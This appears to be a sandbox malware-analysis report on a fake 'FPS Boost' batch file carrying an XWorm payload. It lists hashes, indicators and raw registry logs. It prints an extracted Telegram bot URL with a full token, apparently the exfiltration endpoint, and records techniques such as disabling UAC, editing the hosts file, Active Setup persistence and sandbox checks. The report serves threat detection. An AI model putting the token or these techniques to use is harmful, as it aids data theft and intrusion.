Analysis
-
max time kernel
93s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-10-2024 12:45
Static task
static1
General
-
Target
FPS Boost 1.bat.zip
-
Size
4KB
-
MD5
f606e366fe37903c4c0371dac16605de
-
SHA1
826e9869acc36c9f5befd821b57282720ffb4113
-
SHA256
a2ff096d30c78db38eaddf0629b7f26ce36b64588a2ae05b7b9c2a7e9fbe2c05
-
SHA512
a2cfa60e7aec6ccd4a361443d5f66d74dd7cd90bd9f0d1c5b4fda7a363988b180b645a55eec56efaea19379dfb9bceafc5d36b7b49332677c4330095bcae7555
-
SSDEEP
96:d1ASURY4tkC2avn9d45zF4mc52F3UFW2dGpxzx9p+7tex3v:vUR7SC2abyc52FEFPURowx3v
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7278641970:AAEHOVYteJH3T-Bg5zEPMUSj6sdFforQUZw/sendMessag
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/4172-65-0x0000021735C50000-0x0000021735C68000-memory.dmp family_xworm -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" reg.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 33 3360 powershell.exe 36 4172 powershell.exe 52 4172 powershell.exe 54 4172 powershell.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs
Run Powershell and hide display window.
pid Process 4172 powershell.exe 3604 powershell.exe 400 powershell.exe 2588 powershell.exe 1088 powershell.exe 208 powershell.exe 3476 powershell.exe 4560 powershell.exe 3620 powershell.exe 3572 powershell.exe 688 powershell.exe 100 powershell.exe 4256 powershell.exe 2344 powershell.exe 2424 powershell.exe 4732 powershell.exe 2196 powershell.exe 1848 powershell.exe 3360 powershell.exe 828 powershell.exe 1276 powershell.exe 2928 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\Drivers\etc\hosts powershell.exe -
Enumerates connected drives 3 TTPs 14 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 51 ip-api.com -
Drops file in System32 directory 13 IoCs
description ioc Process File created C:\Windows\System32\ 2 cmd.exe File created C:\Windows\System32\ Game Booster cmd.exe File created C:\Windows\System32\ [ cmd.exe File created C:\Windows\System32\ Debloat cmd.exe File created C:\Windows\System32\ [ X to go Back ] cmd.exe File created C:\Windows\System32\ Version 2.0 cmd.exe File created C:\Windows\System32\ _________________________________________________________________________________ cmd.exe File created C:\Windows\System32\ ] cmd.exe File created C:\Windows\System32\ Cleaner cmd.exe File created C:\Windows\System32\ [ cmd.exe File created C:\Windows\System32\ 3 cmd.exe File created C:\Windows\System32\ 7 cmd.exe File created C:\Windows\System32\ 1 cmd.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 400 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 1980 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\L1040" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\de-DE\\VoiceActivation_de-DE.dat" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\L3082" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "SR de-DE Locale Handler" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Haruka" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Speech Recognition Engine - de-DE Embedded DNN v11.1" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\lsr1033.lxa" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\r1036sr.lxa" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Julie - French (France)" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Zira - English (United States)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "SR ja-JP Lts Lexicon" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Speech Recognition Engine - ja-JP Embedded DNN v11.1" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local 